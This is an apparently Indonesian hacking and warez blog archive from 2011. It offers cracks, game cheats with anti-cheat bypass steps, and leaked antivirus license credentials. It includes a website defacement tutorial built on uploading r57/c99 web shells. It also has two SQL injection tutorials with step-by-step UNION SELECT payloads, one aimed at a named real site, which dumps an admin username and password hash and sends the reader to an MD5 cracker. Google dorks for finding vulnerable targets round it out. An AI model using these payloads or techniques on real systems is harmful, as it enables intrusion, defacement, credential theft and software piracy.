Kamis, 23 Juni 2011

IDM 6.06 Build 8 + crack






bagaimana ? mantab dah ni IDM update mulu hahaha

nah kalau crack nya tetep lah pakai crack andalan ane yang ga ada matinya nih crack SnD yaitu Seek n Destroy !!!



gmana ? woke dan mangstab kan ?

ngapain nunggu nunggu lagi langsung aja download IDM dan cracknya !!!

download IDM disini dan cracknya disini

full hack PB

DAMAGE SG : Auto ON
Fullhack : INSERT | Onkan saat Di Lobby
 
Download

Cheat Ayodance 24 Juni 2011

[*]Space : PF Normal
[*]Left Control : All PF Off
[*]Num Lock : DC Hack On
[*]Caps Lock : DC Hack Off
[*]F1 : Forced Map To Haunted School
[*]F3 : Insane On
[*]F4 : Insane Off
[*]F5 : Chance Random Hack
[*]F6 : Chance Free Hack
[*]F7 : LAST NPC For BP Clubber
[*]F8 : Mode To Crazy 4
[*]F9 : Mode To Crazy 8
[*]F10 : BR To D4
[*]F11 : Unlock Story Song
[*]F12 : Lock Story Song
[*]Insert : Skin Normal Hack
[*]Delete : Skin Black Hack
[*]Home : Skin White Hack
Nb : *Cheat Ini Hanya Dll Untuk Injector

download disini 

Bypassed RF Elven 22 Juli

1. buka MHS trus open save file : RF online.issave
2. pakai rf elven trus masuk>>setelah patch selesai open debug target rf_online.bin
3. hapus cversion.dll
4. copas cfg file ke file dcfg (jangan klik yes dulu)
5. kotak delphine done langsung secepat kilat tekan yes
6. matikan fggm.exe ( ingat klo deepfreeze masih terkunci fggm.exe tidak akan bisa di kill)


download settingannya klik >> Download Link

Shortcut key [ windows ]

  1. Accessibility Controls ==>Perintah==>access.cpl
  2. Add Hardware Wizard ==>Perintah==> hdwwiz.cpl
  3. Add/Remove Programs =>Perintah==> appwiz.cpl
  4. Administrative Tools =>Perintah=> control admintools
  5. Automatic Updates==>Perintah==>wuaucpl.cpl
  6. Bluetooth Transfer Wizard==>Perintah==>fsquirt
  7. Calculator==>Perintah==>calc
  8. Certificate Manager==>Perintah==>certmgr.msc
  9. Character Map==>Perintah==>charmap
  10. Check Disk Utility==>Perintah==>chkdsk
  11. Clipboard Viewer==>Perintah==>clipbrd
  12. Command Prompt==>Perintah==>cmd
  13. Component Services==>Perintah==>dcomcnfg
  14. Computer Management==>Perintah==>compmgmt.msc
  15. Date/Time Properties==>Perintah==>timedate.cpl
  16. DDE Share==>Perintah==>ddeshare
  17. Device Manager==>Perintah==>devmgmt.msc
  18. Direct X Control Panel (If Installed)*==>Perintah==>directx.cpl
  19. Direct X Troubleshooter==>Perintah==>dxdiag
  20. Disk Cleanup Utility==>Perintah==>cleanmgr
  21. Disk Defragment==>Perintah==>dfrg.msc
  22. Disk Management==>Perintah==>diskmgmt.msc
  23. Disk Partition Manager==>Perintah==>diskpart
  24. Display Properties==>Perintah==>control desktop
  25. Display Properties==>Perintah==>desk.cpl
  26. Display Properties (w/Appearance Tab Preselected)==>Perintah==>control color
  27. Dr. Watson System Troubleshooting Utility==>Perintah==>drwtsn32
  28. Driver Verifier Utility==>Perintah==>verifier
  29. Event Viewer==>Perintah==>eventvwr.msc
  30. File Signature Verification Tool==>Perintah==>sigverif
  31. Findfast==>Perintah==>findfast.cpl
  32. Folders Properties==>Perintah==>control folders
  33. Fonts==>Perintah==>control fonts
  34. Fonts Folder==>Perintah==>fonts
  35. Free Cell Card Game==>Perintah==>freecell
  36. Game Controllers==>Perintah==>joy.cpl
  37. Group Policy Editor (XP Prof)==>Perintah==>gpedit.msc
  38. Hearts Card Game==>Perintah==>mshearts
  39. Iexpress Wizard==>Perintah==>iexpress
  40. Indexing Service==>Perintah==>ciadv.msc
  41. Internet Properties==>Perintah==>inetcpl.cpl
  42. IP Configuration (Menampilkan konfigurask koneksi)==>Perintah==>ipconfig /all
  43. IP Configuration (Menampilkan konentens DNS Cache)==>Perintah==>ipconfig /displaydns
  44. IP Configuration (Mendelete DNS konten Cache)==>Perintah==>ipconfig /flushdns
  45. IP Configuration (Pelepasan Semua Koneksi)==>Perintah==>ipconfig /release
  46. IP Configuration (Memperbaharui Semua Koneksi)==>Perintah==>ipconfig /renew
  47. IP Configuration (Refreshes DHCP & Re-Registers DNS)==>Perintah==>ipconfig /registerdns
  48. IP Configuration (Menampilkan DHCP Class ID)==>Perintah==>ipconfig /showclassid
  49. IP Configuration (Memodifikasi DHCP Class ID)==>Perintah==>ipconfig /setclassid
  50. Java Control Panel (Jika diinstall)==>Perintah==>jpicpl32.cpl
  51. Java Control Panel (Jika diinstall)==>Perintah==>javaws
  52. Keyboard Properties==>Perintah==>control keyboard
  53. Local Security Settings==>Perintah==>secpol.msc
  54. Local Users and Groups==>Perintah==>lusrmgr.msc
  55. Logs You Out Of Windows==>Perintah==>logoff
  56. Microsoft Chat==>Perintah==>winchat
  57. Minesweeper Game==>Perintah==>winmine
  58. Mouse Properties==>Perintah==>control mouse
  59. Mouse Properties==>Perintah==>main.cpl
  60. Network Connections==>Perintah==>control netconnections
  61. Network Connections==>Perintah==>ncpa.cpl
  62. Network Setup Wizard==>Perintah==>netsetup.cpl
  63. Notepad==>Perintah==>notepad
  64. Nview Desktop Manager (If Installed)==>Perintah==>nvtuicpl.cpl
  65. Object Packager==>Perintah==>packager
  66. ODBC Data Source Administrator==>Perintah==>odbccp32.cpl
  67. On Screen Keyboard==>Perintah==>osk
  68. Opens AC3 Filter (If Installed)==>Perintah==>ac3filter.cpl
  69. Password Properties==>Perintah==>password.cpl
  70. Performance Monitor==>Perintah==>perfmon
  71. Phone and Modem Options==>Perintah==>telephon.cpl
  72. Power Configuration==>Perintah==>powercfg.cpl
  73. Printers and Faxes==>Perintah==>control printers
  74. Printers Folder==>Perintah==>printers
  75. Private Character Editor==>Perintah==>eudcedit
  76. Quicktime (If Installed)==>Perintah==>QuickTime.cpl
  77. Regional Settings==>Perintah==>intl.cpl
  78. Registry Editor==>Perintah==>regedit
  79. Registry Editor==>Perintah==>regedit32
  80. Remote Desktop==>Perintah==>mstsc
  81. Removable Storage==>Perintah==>ntmsmgr.msc
  82. Removable Storage Operator Requests==>Perintah==>ntmsoprq.msc
  83. Resultant Set of Policy (XP Prof)==>Perintah==>rsop.msc
  84. Scanners and Cameras==>Perintah==>sticpl.cpl
  85. Scheduled Tasks==>Perintah==>control schedtasks
  86. Security Center==>Perintah==>wscui.cpl
  87. Services==>Perintah==>services.msc
  88. Shared Folders==>Perintah==>fsmgmt.msc
  89. Shuts Down Windows==>Perintah==>shutdown
  90. Sounds and Audio==>Perintah==>mmsys.cpl
  91. Spider Solitare Card Game==>Perintah==>spider
  92. SQL Client Configuration==>Perintah==>cliconfg
  93. System Configuration Editor==>Perintah==>sysedit
  94. System Configuration Utility==>Perintah==>msconfig
  95. System File Checker Utility (Segera scan)=>Perintah=>sfc /scannow
  96. System File Checker Utility (Pindai Sekali Pada Boot Berikutnya)  =>Perintah=>sfc /scanonce
  97. System File Checker Utility (Scan seluruh Boot)=>Perintah=>sfc /scanboot
  98. System File Checker Utility (Kembali ke setting Default)=>Perintah=>sfc /revert
  99. System File Checker Utility (Purge File Cache)==>Perintah==>sfc /purgecache
  100. System File Checker Utility (Set Cache Size untuk ukuran x)==>Perintah==>sfc /cachesize=x
  101. System Properties==>Perintah==>sysdm.cpl
  102. Task Manager==>Perintah==>taskmgr
  103. Telnet Client==>Perintah==>telnet
  104. User Account Management==>Perintah==>nusrmgr.cpl
  105. Utility Manager==>Perintah==>utilman
  106. Windows Firewall==>Perintah==>firewall.cpl
  107. Windows Magnifier==>Perintah==>magnify
  108. Windows Management Infrastructure==>Perintah==>wmimgmt.msc
  109. Windows System Security Tool==>Perintah==>syskey
  110. Windows Update Launches==>Perintah==>wupdmgr
  111. Windows XP Tour Wizard==>Perintah==>tourstart
  112. Wordpad==>Perintah==>write

1HIT SG + NO RESPAWN + DEFUSE

Download

 HOTKEY DAN TUTOR
LIAT DI NOTICE

No Respawn, Pasang/Defuse BOM 0 Detik

download

Hotykey :
[-] Auto On

Char hack baru

SWAT_Male [ Hide ] :Download

Rebel Mele : Download

REBELMaletoDFOX : Download

SWATMaleToLeopard : Download

Rabu, 22 Juni 2011

Deface Website

Hi semuanya, kembali lagi dengan saya. Kali ini mau berbagi bagaimana cara Deface Website, karena yang request Cara Deface Website ini banyak sekali, bejibun masuk ke email saya. Akhirnya saya membuat artikel ini untuk memenuhi peremintaan kalian semua, let’s DEFACE WEBSITE – DEFACING WEBSITE..

Okelah kalau begitu semuanya, langsung lanjut ajah, skenarionya sebagai berikut:

1. Anda sudah memiliki target website, kalau masih belum silakan cari di google melalui google dork yang anda punya atau bisa melihat Google Dork Remote File Inclusion – Webapps di www.exploit-db.com sampai Anda berhasil mendapatkan Target Website.

2. Setelah mendapatkan target website, silakan upload SHELL INJECT anda, kebetulan saya menggunakan tools sendiri “File Manager Binus Hacker” :) (Maaf: tidak untuk dipublikasikan) Anda bisa menggunakan r57shell / c99 shell / lainnya. Toolsnya bisa di download disini untuk rshell / c99: Download Shell Injection

3. Setelah anda mengupload Shell Injection, siapkan halaman “DEFACEMENT PAGE“, kebetulan saya menamainya dengan”HACKED.html“

4. Setelah itu silakan kunjungi website target anda yang sudah di Deface.

Penjelasannya detail & langkah-langkahnya:
1. Silakan cari target di google, misalnya: “inurl:page.php?xxx=” atau “intitle: Google Dork” (Kumpulan google dork banyak tersedia di google, silakan di search aja) atau anda bisa melihat list Google Dork Di www.exploit-db.com , kemudian inject target website tersebut. Nah, kebetulan saya mendapatkan target dibawah & kemudian melakukan aktifitas shell injection, berikut gambarnya:

Deface Website - Website Target



2. Langkah selanjutnya, saya melakukan upload fmbh.php (File Manager Binus Hacker), Anda bisa menggunakan Rshell / C99 untuk di upload ke website target tersebut. Directory yang saya pakai di webtarget adalah /vservers/silentcat/htdocs/includes/. Jadi ketika saya membuka shell di target menjadi: http://www.target.com/includes/fmbh.php

Deface Website - Update Shell



3. Setelah itu kita siapkan file halaman defacement: “HACKED.html”

Defacing Website - Membuat Halaman Defacement

Kemudian kita save menjadi: “HACKED.html”
Defacing Website - Halaman Deface Page



4. Upload “HACKED.html” ke website target tadi, saya melakukan upload di /vservers/silentcat/htdocs/ artinya saya berada di lingkungan home directory.

Deface Website - Lokasi Home Directory Website

Upload file HACKED.html, dari local computer yang anda simpan tadi.

Deface Website - Cara Upload Page Defacement

Sehingga akan tampak hasil upload file “HACKED.html” sebagai berikut:
Deface Website - Hasil Upload File Hacked Html

Dikarenakan permissionnya “600” (rw——-), artinya hanya Owner saja yang bisa melakukan “read & write” di file tersebut, kita harus merubah permissionnya menjadi “777″ / “755″, kalau 777 artinya semuanya memiliki akses “read, write & execute”, sedangkan saya hanya memakai “755″ biar bisa di baca & eksekusi saja:

Defacing Website - CHMOD file



5. Jika sudah selesai, maka lihat hasil DEFACE di: “http://www.target.com/hacked.html”

Nah, sudah selesai.. Cukup mudah melakukan deface website, silakan lakukan eksperimen yang lebih banyak lagi.
Enjoy & Eat It!

SQL injection tutorial part 2

Mari kita coba praktekkan cara diatas!
Sebagai contoh kita mendapatkan target sebagai berikut:
Code:
http://www.cocobod.gh/news_details.php?id=30
Sekarang kita akan melakukan pengecekan apakah website tersebut memiliki vulnerability dengan menambahkan tanda di akhir URL, contohnya sebagai berikut:
Code:
http://www.cocobod.gh/news_details.php?id=30'
Jika kita menemukan error, maka terdapat vulnerability di website tersebut, sebagai contoh:

Setelah kita mengetahui ada vulnerability, maka langkah selanjutkan adalah kita harus mengetahui berapa jumlah kolom yang ada di table tersebut.
Kita akan mengetahuinya sampai ada informasi “Unknown Column“.
Lakukan pengecekan dengan menggunakan perintah “order by“.
Kita akan mencoba dari 1……..tak hingga, jadi bisa saja 1,2,3,4,5,6,7,dst.
Kebetulah dalam target ini hanya terdapat 7 kolom dalam table yang ada di database,
Contohnya:

Langkah pengetesannya adalah
Code:
http://www.cocobod.gh/news_details.php?id=30 order by 1-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 2-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 3-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 4-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 5-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 6-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 7-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 8-- >> Unknown column

http://www.cocobod.gh/news_details.php?id=30 order by 8– *>> Unknown column
Hal tersebut membuktikan bahwa tidak ada kolom ke 8 dalam table tersebut, jadi cuman ada 7 kolom.

Langkah selanjutnya adalah, mencari kolom yang dapat di akses!

Kita sudah mengetahui, jumlah kolom adalah 7, kita gunakan perintah “UNION SELECT number,of,columns–” untuk mengatahui kolom mana yang dapat di akses:
Code:



http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,6,7--

Anda akan menemukan seperti gambar berikut:


Binus Hacker Tutorial
Muncul 6, 2, 3 kan? Kolom dalam tersebutlah yang bisa anda akses dan anda ambil informasinya.


Langkah selanjutnya, mencari informasi versi database


SQL Injection bekerja baik pada versi 5.* ke atas, untuk mendapatkan informasi database version, kita masukkan saja “@@version”, pada kolom dimana saja yang bisa dipakai.
Misalkan kolom “6″ kita ganti dengan “@@version”



Code:

http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,@@version,7--

Binus Hacker Tutorial

Akan muncul versi database 5.1.39, ini berarti database bisa di inject :)

Mengetahui Database Name


Langsung ajah kita replace kolom yang tadi digunakan “6,2,3″ dibagian mana saja, kita gunakan kolom “6″, kita ganti dengan code berikut “group_concat(schema_name)” , dan jangan lupa tambahkan “from information_schema.schemata–” sesudah kolom terakhir.

Code:


http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,group_concat(schema_name),7 from information_schema.schemata--
Binus Hacker Tutorial
Mengatahui Database Yang Dipakai
Langsung ajah ganti “group_concat(schema_name)” dengan “concat(database())” seperti contoh berikut:
Code:
http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,concat(database()),7 from information_schema.schemata--
Binus Hacker Tutorial
Selamat, anda telah mengetahui database yang dipakai saat ini adalah “cocobod_gh“.
Mengetahui Nama Tabel

Langsung aja ganti “group_concat(table_name)” dan tambahkan “from information_schema.tables where table_schema=database()–” setelah kolom terakhir.
Code:
http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,group_concat(table_name),7 from information_schema.tables where table_schema=database()--
Binus Hacker Tutorial
Mengatahui Nama Kolom

Untuk mengetahui nama kolom, kita gunakan query berikut:
group_concat(column_name)
from information_schema.columns where table_schema=database()–

Code:
http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,group_concat(column_name),7 from information_schema.columns where table_schema=database()--
Binus Hacker Tutorial
Mengambil Informasi Yang Ada Di Dalam Kolom

Ini adalah step akhir, dimana anda akan mendapatkan informasi mengenai isi dari kolom yang berada dalam table di database.
Eksekusi perintah berikut:

Code:
http://www.site.com/news_details.php?id=30 union select 1,2,3,4,5,group_concat(columusername,0x3a,columnpassword),7 from currentdb.tableused--
Exploit akan menjadi seperti berikut :
Code:
http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,group_concat(username,0x3a,password),7 from cocobod_gh.coc_admin--
Binus Hacker Tutorial
Dari informasi di atas kita mendapatkan data: “comaster:2c39e3769d300f7e23f8a9e1e21773e7 ,
Silakan check ke MD5 decrypter untuk mendecrypt password -> http://www.md5decrypter.co.uk/ paste MD5 password yang tadi yaitu: “2c39e3769d300f7e23f8a9e1e21773e7“, anda akan medapatkan result seperti dibawah:

Binus Hacker Tutorial

SQL injection tutorial part 1

SqLi Tutorial – Sql Injection Tutorial – Sql Injection Artikel – SQL Injection Article
Sqli (alias Sql Injection atau Structured Query Language Injeksi) adalah langkah pertama dalam entri untuk memanfaatkan atau hacking website. Hal ini mudah dilakukan dan merupakan titik dari awal yang bagus. Sayangnya tutorial yang sedikit rumit sehingga itulah sebabnya ane menulis ini. Sqli pada dasarnya hanyalah suntikan pertanyaan ke dalam database atau menggunakan query untuk mendapatkan bypass otorisasi sebagai sebuah admin.

Untuk Mencari Inject
Mencari SQLI sangat mudah,semua yang perlu ente2 lakukan adalah Googling . Hal pertama yang perlu ente2 lakukan adalah menemukan beberapa dorks
Code:

inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:read.php?id=
"id=" & intext:"Warning: mysql_fetch_assoc()
"id=" & intext:"Warning: mysql_fetch_array()
"id=" & intext:"Warning: mysql_num_rows()

Lebih lengkap, silakan dicari di Google

Pilih salah satu dorks dan menambahkan inurl: sebelum
(Jika mereka belum memiliki itu) dan kemudian salin dan sisipkan
ke google. Pilih salah satu situs dari google dan chek 1-1.
Sebagai contoh url dari halaman ente berada mungkin terlihat seperti ini
Code:

http://www.example.com/index.php?id=3

untuk memeriksa adanya Bug MySQL tinggal tambahin “‘” di akhir URL
contoh
Code:

http://www.example.com/index.php?id=3'

tekan enter sampai ente2 mendapatkan ERROR
Mendapatkan Jumlah Kolom
Setelah ente menemukan situs yg udah di siapin ,langkah pertama yang perlu ente2 ambil adalah
untuk menemukan jumlah kolom. Cara termudah untuk melakukannya adalah
menggunakan pernyataan “order by”. Yang harus ente lakukan adalah meletakkan ORDER BY (angka) -
pada akhir url ente. Jadi seharusnya terlihat seperti ini.
Code:

http://www.example.com/index.php?id=3 ORDER BY (number)--

setelahnya ane ubah jadi bahasa inggris dah..
capek translatenya
wkwkwkwkwkwkwkwkwkw :P
Yuk kita lanjutkan ke order by 8– kamu akan mendapatkan sebuah error. Ini membuktikan bahwa table database hanya memiliki 7 kolom, ini dibuktikan bahwa ketika anda melakukan order by lebih dari 7, akan selalu error. Jika kamu memiliki memory yang kurang baik, silakan buka notepad & catat kolom-kolom yang anda temukan.
Menemukan kolom yang dapat di akses

Setelah kita mengetahui kolom yang ada di table database, sekarang kita akan mencari informasi & data apa yang bisa diambil dari sana.
Kita melakukan hal tersebut dengan menggunakan fungsi “UNION” “SELECT” dan NOMOR KOLOM. Kita selipkan seluruhnya dalam URL, seperti contoh berikut:
Code:

http://www.example.com/index.php?id=-3+UNION+SELECT+1,2,3,4,5,6,7--

Jangan lupa untuk menyisipkan tanda “-” sebelum code dimulai, jadi sebagai contoh di atas kita selipka tanda “-” didepan angka “3“, nah setelah semua dilakukan, maka akan muncul table yang memiliki isi didalamnya. Catatlah nomor kolom table yang memiliki informasi di dalam database tersebut. Klo lupa, simpan dulu di notepad.
Finding MySQL Database Version
Sebelum kita melanjutkan hal ini, maka yang perlu kita ketahui adalah versi dari database.
URL nya adalah sebagai berikut:
Code:

http://www.example.com/index.php?id=-3+UNION+SELECT+1,2,3,4,5,6,7--

Kita ganti angka “1” dengan  “@@version” untuk mengetahui informasi versi database, berikut contohnya:
Code:

http://www.example.com/index.php?id=-3+UNION+SELECT+@@version,2,3,4,5,6,7--

Tekan enter, maka anda akan menemukan informasi database yang digunakan.
Hal ini biasanya bekerja pada versi database 5.* keatas.
Finding Database Names

Selanjutkan kita akan inject website untuk menemukan database names. Kita lakukan hal ini dengan mengganti “@@version
dengan “group_concat(schema_name)” dan juga ditambahkan “+ from+information_schema.schemata–” sesudah nomor kolom terakhir di table database.
Seperti ini contoh URLnya:
Code:

http://www.example.com/index.php?id=-3+UNION+SELECT+group_concat(schema_name),2,3,4,5,6,7+ from+information_schema.schemata--

Hal tersebut akan menunjukkan daftar nama database. Sekarang untuk menemukan database mana yang saat ini dipakai adalah dengan mengganti “group_concat(schema_name)” dengan concat(database()) dan hapus “+ from+information_schema.schemata
Jadi URL nya akan menjadi seperti ini:
Code:

http://www.example.com/index.php?id=-3+UNION+SELECT+concat(database()),2,3,4,5,6,7--

Selamat, anda telah mendapatkan informasi database yang saat ini digunakan.
Menemukan Nama Table

Untuk mengetahui nama table yang digunakan dalam database, anda harus mengganti “concat(database())” dengan group_concat(table_name) dan tambahkan “from information_schema.tables where table_schema=database()” diantara nomor awal dan “–” hapus juga tanda “+” dari “union select“.
Urlnya akan tampak seperti berikut:
Code:

http://www.example.com/index.php?id=-3 union select group_concat(table_name),2,3,4,5,6,7 from information_schema.tables where table_schema=database()--

Nah, hal tersebut akan menampilkan nama table yang digunakan di database.
Menemukan Nama Kolom

Lakukan dengan hanya merubah “table_name” ke “column_name” dan “information_schema.tables” ke “information_schema.columns”.
Url akan tampak seperti ini:
Code:

http://www.example.com/index.php?id=-3 union select group_concat(column_name),2,3,4,5,6,7 from information_schema.columns where table_schema=database()--

Hal tersebut akan memunculkan nama table.
Misalkan nama colom seperti berikut:
admin_username
admin_password
Mengambil Informasi Database
Sekarang kita sudah mengetahui “database name, table names, dan colomn names”, kita bisa menyatukannya bersama-sama dan mengeluarkan informasi yang ada di sana, kita lakukan dengan contoh berikut:
Code:

http://www.example.com/index.php?id=-3 union select 1,group_concat(Columnname,0x3a,columnname,0x3a),2,3,4,5,6,7 from databasename.tablename--

Sekarang ganti “columnname” dengan kolom yang anda mau ambil informasinta. “0x3a” akan membuat jeda diantara informasi yang anda dapatkan dari masing-masing colom. Jangan lupa juga untuk merubah “databasename.tablename” dengan database dan nama tabel dimana kolom ada di database dan tabel tersebut.
Sebagai contoh:
Code:

http://www.example.com/index.php?id=-3 union select 1,group_concat(admin_username,0x3a,admin_password,0x3a),2,3,4,5,6,7 from whippit.t_admin--

Sekarang anda akan mendapatkan informasi username & database

CIA Wallhack

Download

HOTKEY
INSERT

Notice keluar tekan Enter dan jangan gerakan mouse sebelum login

Selasa, 21 Juni 2011

soundbreak 6.2

Feature :
[-] Wallhack
[-] Crooshair

Hotkey :
[-] Insert = Wallhack
[-] Home= Crosshair

TUTORIAL :
[-] Buka PB Launcher
[-] Buka Injector
[-] Start PB
[-] Klik b!LLkRaZ
[-] Tunggu Sampai Timbul Notice
[-] Klik Ok
[-] Klik resume

Nb :
[-] Harus install vcredits & NetFramework
[-] klo bugtrap coba gunakan metode flasdisk
[-] kalian harus copy msvcr100.dll di C:\WINDOWS\system32





Download

BLooderian V1

passwordnya blooderz.us
 
 Fast Respawn , Fast Plant ,Fast Defuuse
 
download 

10 program untuk mempercepat koneksi internet

Kali ini saya akan share 10 program untuk mempercepat koneksi internet
saya aja ni lagi download smua hehehe

oke langsung aja ya

1. Onspeed 6.0.9

Software ini bisa meningkatkan kecepatan internet anda hingga 10 kali lipat!!! (Dial-up – 10x Faster, Broadband – 5x Faster, Mobile connections – 8x Faster).

DOWNLOAD


2. CFosSpeed

Tool ini Untuk Mempercepat Akses Internet Cocok Buat Koneksi Lemot (Traffic Compresson System)

DOWNLOAD


3. Flash Speed 200%

Flash Speed 200% is an Internet accelerator that help you optimize your Internet connection speed 200% or more. The software changes some Windows settings to give you faster performance, and optimize your Internet connection speed 200% or more according to your computer. It support optimiz Dial-Up, Lan, Cable, ADSL, HDSL, VDSL and PPPoE connections up to 200% faster. Increase your download speeds.


DOWNLOAD


4. Dsl Speed

DSL Speed is a prefessional tool that will online optimize your
DSL(e.g.,ADSL,G.lite,IDSL,SDSL)connection speed to MAX.
Main Features:
Online optimize your DSL (ADSL) connection speed.
Auto verify your ISP’s MTU and your DSL (ADSL) unique optimize
value.
Faster loading Web Pages.
Tweaks DNS Errors Caching In Windows 2000/XP.
Tweaks ICS In Windows 98SE.

DOWNLOAD


5. Internet Turbo

Software untuk meningkatkan kecepatan internet.

DOWNLOAD


6. Modem Booster

Software untuk mempercepat kinerja Modem

DOWNLOAD


7. Firefox Ultimate Optimizer

Software untuk optiamasi Browser firefox

DOWNLOAD


8. Fasterfox

Add-ons untuk browser Firefox. Setelah Fasterfox selesai terinstall, restart Firefox anda. Tanda kalau Fasterfox sudah terinstall di Firefox anda adalah akan ada gambar rubah kecil di sisi kanan bawah Firefox anda.

DOWNLOAD


9. Google Web Accelerator

Tanda kalo GoogleWebAccelerator sudah terinstall di web browsing anda adalah akan ada gambar jam kecil di web browsing anda. GoogleWebAccelerator akan menunjukkan berapa banyak waktu yang telah dihemat karena menggunakan GoogleWebAccelerator.

DOWNLOAD


10. FullSpeed2.7

Dramatically speed up your existing Internet broadband connection and get the best performance possible from your current Internet connection. Full Speed will increase your online Internet speed with everything you do: faster downloading, web browsing and web page loading, data streaming, email, P2P and gaming. Full Speed will also improve the performance of business communications which utilise Broadband technologies including Remote Desktop sessions, Intranets and Extranets over VPN’s and WANs . One click it’s done; no questions or any knowledge is required. Full Speed has a ‘Clean’ Award from Softpedia confirming that it is completely Spyware FREE. Full Speed also has no banners, popups, adverts, contracts, subscriptions, viruses or malware of any kind. Free performance testing software is also included for testing and comparison of download speeds and Web browsing performance.

DOWNLOAD

VB 6.0 full version


Serial Number 111-1111111
Hanya 85 MB



Video Tutor Aplikasi Di VB

Teks Berkedip




Teks Berjalan



Teks pada form (Berjalan)




animasi bergerak (gif) pada form



MICROSOFT VISUAL STUDIO 2008 700MB + FULL ISO




Untuk embel2 VB6 nya silahkan pilih





soundbreak 6.0

 Download

Feature :
[-] Kill Invicible Time, No Respawn, Pasang/Defuse BOM 0 Detik

Hotykey :
[-] Delete

TUTORIAL :
[-] Buka PB Launcher
[-] Buka Injector
[-] Start PB
[-] Klik b!LLkRaZ
[-] Isi Password
[-] Tunggu Sampai Timbul Notice
[-] Klik Ok
[-] Klik resume


Nb :
[-] Harus install vcredits & NetFramework
[-] klo bugtrap coba gunakan metode flasdisk
[-] Password : Scarletzer

Download Aplikasi hp Symbian

1. zipman plugin.rar v1.0.sis
2. zipman 2.50.sis
3. X.Plore v1.00lcg.sis
4. Xplore v1.00.Cr.sis
5. Wma plugins.sis
6. TcpmpV0.71.sis
7. Sms Timer Full v1.40.sis
8. SMS Scheduler v1.00.zip
9. Smart Movie v3.40 cracked BiNPDA.sis
10. Smart Movie v3.32.S60 BiNPDA.sis
11. Smart Movie v3.25.C.Bin.zip
12. Profi mail v2.40 lcg.sis
13. Profi Mail 2nd Os6 Os7 Cracked Cultpda Iphone.zip
14. Power mp3 2.41.sis
15. Power MP3 1.02. Reg255.sis
16. Pocket Qur'an S60 0.96b.zip
17. Pocket Qur'an 2007.zip
18. Pmail 2.30 reg 0.sis
19. Photo fix.v1.0.sis
20. Photo acute 2.00.1 full 6600 6260.sis
21. Photo acute 2.00.1 full 6600 6260.sis
22. Philipcamcorder pro.sis
23. Panoman.sis
24. Opera v6.20 CRACK.sis
25. Opera v6.20 SymbianOS7 Cracked SymBoSS.sis
26. Opera 6.30 for ngage.sis
27. Msg to MMC.sis
28. Msg Drive E.Icon.1GB.sis
29. Mp3 as ringtone.sis
30. Mobiola Media player 1.0.2ndwl.sis
31. Mobiola Media player 1.0.2ndwl.sis
32. Mmc cache.sis
33. Memory Booster 3660.sis
34. mcode.zip
35. Lcg.x plore v0.99 beta s60.sis
36. LCG Jukebox 2.11 s60v2 BiNPDA.sis
37. LCG Jukebox 1.01_1.02.zip
38. IrRemote v1.71.Cr.sis
39. ImPlus 5.61 OS7.sis
40. image plus.v1.2.t.sis
41. Camcorder pro3.sis
42. 3D screen saver.sis

Langsung Di upload 1 Paket Download Disini ..

eset nod32 username and password

Username: EAV-36635699
Password: tfphkesfxx
Expiration: 07/07/2011

Username: EAV-36342713
Password: v3tcb8n3r3
Expiration: 26/06/2011

Username: EAV-36356032
Password: c34h5bb6tx
Expiration: 27/06/2011

Username: EAV-36356033
Password: p7bp45bcjd
Expiration: 27/06/2011

Username: EAV-36390963
Password: bcdasjn6d4
Expiration: 30/06/2011

Username: EAV-36390964
Password: 6t72mk2mnh
Expiration: 30/06/2011

Username: EAV-36390965
Password: h3d7md2tdv
Expiration: 30/06/2011

Username: EAV-36564343
Password: tx3rjsc5er
Expiration: 03/07/2011

Username: EAV-36576757
Password: jxmd4edsvk
Expiration: 05/07/2011

Username: EAV-36631802
Password: ajm4fv7e6p
Expiration: 07/07/2011

Username: EAV-36633935
Password: eh6nh64ccu
Expiration: 07/07/2011

Jumat, 17 Juni 2011

Perbedaan http dan https

HTTP adalah dasar komunikasi data untuk World Wide Web (WWW). Setiap kali kita membuka website / halaman web kita akan menggunakan protokol ini.
Sisi client meminta sisi server untuk membuka komunikasi pada port 80, port terbuka sisi server 80 dan di sisi client port acak terbuka.
Berikut ini adalah gambar ketika aku membuka http://www.kaskus.us dan melihat port yang terbuka menggunakan netstat-an.

Seperti yang bisa kita lihat dari gambar, komputer klien membuka port lokal acak dan port terbuka 80 pada sisi server.
Apakah HTTP (Hyper Text Transfer Protocol) Aman?
Untuk menjawab pertanyaan ini, mari kita lihat eksperimen di bawah ini.

Dalam percobaan ini, ada 2 orang dalam satu jaringan nirkabel dan BadGuy NiceGuy. NiceGuy mencoba untuk membuka http://friendster.com kemudian login ke dalamnya. Di tempat berbeda, BadGuy dalam jaringan nirkabel yang sama dengan NiceGuy seperti yang ditunjukkan pada gambar di bawah:

BadGuy menggunakan Wireshark untuk menangkap data paket semua ditransmisikan ke / dari titik akses. Dalam hal ini BadGuy hanya mengumpulkan dan melihat data paket yang dikirim oleh orang lain.
Berikut adalah gambar ketika NiceGuy memasukkan username (email) dan password di friendster.com

